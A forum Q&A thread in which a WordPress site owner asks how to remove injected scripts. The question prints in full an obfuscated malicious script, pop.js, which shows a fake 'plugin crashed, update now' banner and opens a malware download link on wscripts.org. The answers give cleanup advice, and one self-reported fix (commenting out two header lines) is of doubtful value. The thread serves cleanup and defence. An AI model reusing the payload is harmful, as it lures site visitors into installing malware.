# "Couldn't find database jimbob_je" malware injection message in wordpress. How to remove?

Tags: wordpress, code-injection, malware, encryption

I'm having this message in a wordpress site:

> Couldn't connect to database server.Couldn't find database
>   jimbob_je.An unexpected problem has occured with the application.
>   SELECT statscurl_id FROM `statscurl` WHERE statscurl_ip = '';

I already used **sucuri.net** to check but it didn't find anything but still getting the error. I checked Page Source from my browser and there are 2 encrypted scripts above the ending header tag, but I don't find them in header.php.

The 2 scripts have **"eval(unescape"** at the beginning and when page is loading in the status bar appears 2 sites: **wscripts.org** and **jquery.com**
Also when inspecting with **Firebug** the loaded scripts there are 2 called **pop.js** and **imwb_cab_script.js** but they are not encrypted and come from sites mention above. Both randomly load.

This is the code for **imwb_cab_script.js**

```
jQuery(document).ready(function($) {
// $() will work as an alias for jQuery() inside of this function
imwb_activate_cab();
$('.imwb_cabar').live('click', function() {
var data = {
action :'imwb_cab_ctr_action',
barDetails: $(this).attr('id'),
nonce : IMWB_CAB_Ajax.nonce
};
$.ajax({
async: false,
type: 'POST',
url: IMWB_CAB_Ajax.ajaxurl,
data: data
});
imwb_goto_cab_link();
return true;
});
});
var cabCookie = function(name, value, expireHours, path) {
// name and at least value given, set cookie...
if (arguments.length > 1 ) {
if (expireHours === null || expireHours === undefined) {
expireHours = 7;
```

The other code script, **pop.js** is:

```
var _0xf475=["\x69\x6D\x77\x62\x5F\x63\x61\x62\x31\x5F\x73\x68\x6F\x77","\x4E","\x69\x6D\x77\x62\x5F\x63\x61\x62\x31\x5F\x72\x65\x73\x68\x6F\x77","\x72\x61\x6E\x64\x6F\x6D","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x69\x6D\x77\x62\x5F\x63\x61\x62\x61\x72\x22\x20\x69\x64\x3D\x22\x63\x61\x62\x5F\x31\x5F\x30\x22\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x31\x32\x33\x34\x35\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x63\x6F\x76\x65\x72\x74\x61\x63\x74\x69\x6F\x6E\x62\x61\x72\x2D\x70\x72\x6F\x2F\x69\x6D\x61\x67\x65\x73\x2F\x77\x61\x72\x6E\x69\x6E\x67\x2E\x67\x69\x66\x22\x3E\x3C\x70\x3E\x4F\x70\x70\x73\x21\x20\x59\x6F\x75\x72\x20\x58\x76\x69\x64\x20\x4D\x65\x64\x69\x61\x20\x50\x6C\x75\x67\x69\x6E\x20\x68\x61\x73\x20\x43\x72\x61\x73\x68\x65\x64\x21\x20\x3C\x73\x74\x72\x6F\x6E\x67\x3E\x3C\x73\x70\x61\x6E\x20\x73\x74\x79\x6C\x65\x3D\x22\x74\x65\x78\x74\x2D\x64\x65\x63\x6F\x72\x61\x74\x69\x6F\x6E\x3A\x20\x75\x6E\x64\x65\x72\x6C\x69\x6E\x65\x3B\x22\x3E\x3C\x73\x70\x61\x6E\x20\x73\x74\x79\x6C\x65\x3D\x22\x63\x6F\x6C\x6F\x72\x3A\x20\x23\x30\x30\x30\x30\x66\x66\x3B\x20\x74\x65\x78\x74\x2D\x64\x65\x63\x6F\x72\x61\x74\x69\x6F\x6E\x3A\x20\x75\x6E\x64\x65\x72\x6C\x69\x6E\x65\x3B\x22\x3E\x50\x6C\x65\x61\x73\x65\x20\x55\x70\x64\x61\x74\x65\x64\x20\x4E\x6F\x77\x3C\x2F\x73\x70\x61\x6E\x3E\x3C\x2F\x73\x70\x61\x6E\x3E\x3C\x2F\x73\x74\x72\x6F\x6E\x67\x3E\x3C\x2F\x70\x3E\x3C\x6F\x62\x6A\x65\x63\x74\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x69\x64\x3D\x22\x70\x6C\x61\x79\x65\x72\x22\x20\x63\x6C\x61\x73\x73\x69\x64\x3D\x22\x63\x6C\x73\x69\x64\x3A\x44\x32\x37\x43\x44\x42\x36\x45\x2D\x41\x45\x36\x44\x2D\x31\x31\x63\x66\x2D\x39\x36\x42\x38\x2D\x34\x34\x34\x35\x35\x33\x35\x34\x30\x30\x30\x30\x22\x3E\x3C\x70\x61\x72\x61\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x6F\x76\x69\x65\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x31\x32\x33\x34\x35\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x63\x6F\x76\x65\x72\x74\x61\x63\x74\x69\x6F\x6E\x62\x61\x72\x2D\x70\x72\x6F\x2F\x4A\x46\x50\x6C\x61\x79\x49\x74\x2E\x73\x77\x66\x3F\x75\x72\x6C\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x31\x32\x33\x34\x35\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x63\x6F\x76\x65\x72\x74\x61\x63\x74\x69\x6F\x6E\x62\x61\x72\x2D\x70\x72\x6F\x2F\x63\x61\x62\x61\x72\x2E\x6D\x70\x33\x22\x3E\x3C\x65\x6D\x62\x65\x64\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x31\x32\x33\x34\x35\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x63\x6F\x76\x65\x72\x74\x61\x63\x74\x69\x6F\x6E\x62\x61\x72\x2D\x70\x72\x6F\x2F\x4A\x46\x50\x6C\x61\x79\x49\x74\x2E\x73\x77\x66\x3F\x75\x72\x6C\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x31\x32\x33\x34\x35\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x63\x6F\x76\x65\x72\x74\x61\x63\x74\x69\x6F\x6E\x62\x61\x72\x2D\x70\x72\x6F\x2F\x63\x61\x62\x61\x72\x2E\x6D\x70\x33\x22\x20\x6E\x61\x6D\x65\x3D\x22\x70\x6C\x61\x79\x65\x72\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x74\x79\x70\x65\x3D\x22\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x73\x68\x6F\x63\x6B\x77\x61\x76\x65\x2D\x66\x6C\x61\x73\x68\x22\x3E\x3C\x2F\x65\x6D\x62\x65\x64\x3E\x3C\x2F\x6F\x62\x6A\x65\x63\x74\x3E\x3C\x2F\x64\x69\x76\x3E","\x70\x72\x65\x70\x65\x6E\x64","\x62\x6F\x64\x79","\x2F\x31\x32\x33\x34\x35\x2F","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x64\x6F\x77\x6E\x6C\x6F\x61\x64\x2D\x76\x6C\x63\x2D\x70\x6C\x61\x79\x65\x72\x2F\x3F\x6D\x6E\x3D\x34\x34\x36\x33\x34\x33\x34\x32\x32\x32\x36","\x5F\x73\x65\x6C\x66","\x6F\x70\x65\x6E"];function imwb_activate_cab(){if(cabCookie(_0xf475[0])==_0xf475[1]||cabCookie(_0xf475[2])==_0xf475[1]){return ;} ;setTimeout(imwb_show_cab,2000);} ;function imwb_show_cab(){if(Math[_0xf475[3]]()<0.02){jQuery(_0xf475[6])[_0xf475[5]](_0xf475[4]);cabCookie(_0xf475[2],_0xf475[1],0,_0xf475[7]);} ;} ;function imwb_goto_cab_link(){cabCookie(_0xf475[0],_0xf475[1],0,_0xf475[7]);window[_0xf475[10]](_0xf475[8],_0xf475[9]);} ;
```

Question is how to remove these codes that appear in the browser page source.

You can see the encrypted scripts [**here**](http://pastebin.com/MAEADET4)

Any other solution on how to get rid these codes?

Thanks!!!

PD: the site doesn't use any plugin

Answer (score 0):

I got something similar last week, but infected the PHP files only..
can you show the code you have in the header?

i unescaped the code you put and i see it's apparently trying to steal your users' cookies and display some sort of banner, I suggest you shutdown your site immediately and try to clean up the code manually from your pages.. if you were using a theme with an older version of timthumb than this is probably your security hole !

First thing is to disable the website for public visitors cause i think this code might ve trying to download a virus to the visitors' browser !

to do so, just create that .htaccess file in your root dir:

```
<IfModule mod_rewrite.c>
 RewriteEngine on
 RewriteCond %{REMOTE_ADDR} !^192\.168\.0\.100
 RewriteCond %{REQUEST_URI} !/pageisdown.html$ [NC]
 RewriteCond %{REQUEST_URI} !\.(jpe?g?|png|gif) [NC]
 RewriteRule .* /pageisdown.html [R=302,L]
</IfModule>
```

I got this from [here](http://perishablepress.com/htaccess-redirect-maintenance-page-site-updates/)
then change the line 192.168.0.100 to your own public IP address, then only you will be able to visit the site, and anyone else will be redirected to the pageisdown.html page ! (feel free to create this page and add whatever you like to it..)

second thing you need to scan your files manually and see where this script is coming from, usually it'll be in the form of a php function that looks like this

```
eval(base64_decode(....))
```

the dots (...) are usually lots of base64 encoded code, just remove that function calls and you'll be clean !, and also make sure there are no backdoored files, just check your server for newly created php files or other scripts that you don't remember creating..

Comment: Thanks Mostafa, I made a search usin Sublime Text 2 but it didn't find anything similar. The encrypted code only show under Page Source view in the browser. You can see the encrypted code in Pastebin [link](http://pastebin.com/MAEADET4)

Comment: I used jsunpack to decode these but what do the scripts do??
see here [link](http://jsunpack.jeek.org/?report=5d8ae442e40470d7ae06a58ea08d8e412110992b)

Comment: Hey Miguel, the code seems to be stealing your visitors' cookies and displaying notifications to download some kind of malware I think !

Comment: And I saw your comment below, since the code reappeared then definitely someone has backdoored your installation, you didn't fix it yet,I think there is a hacker inside the system already, I recommend following the steps in my answer to keep your visitors out and safe till you completely fix this bug , and also, you need to remove any newer scripts you don't remember creating or adding.

Comment: Thanks Mostafa, I've already took some secure steps besides yours and comment out, just in case 2 lines above wp_head() as I posted above 13 hours ago and until now all seems to be ok.
Thanks Mostafa for your time.

Comment: Great, I'm glad it's working fine now !, please don't forget to choose the answer as the correct one and to close the question, thanks !:)

Answer (score 0):

**I think I found a fix**: reading a topic "*Malware in header.php*" in **wordpress.stackexchange.com** someone found a code just above **wp_head()** and cleaned the code but this reappeared after a few hours.

I looked for something similar but found nothing suspicious.
Just in case I commented 2 lines above **wp_head(**) like this

```
<!-- <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<?php if ( is_singular() ) wp_enqueue_script( 'comment-reply' ); ?> -->
```

Then reloaded the sites several times and now seems to be ok: no message, no encrypted script when seeing page source, no wscripts.org trying to load, etc. ***Now the site even loads faster.***

I made some secure fixes too.

If happens again, I'll let you know.

**Hope that this may be useful for someone in similar situation.**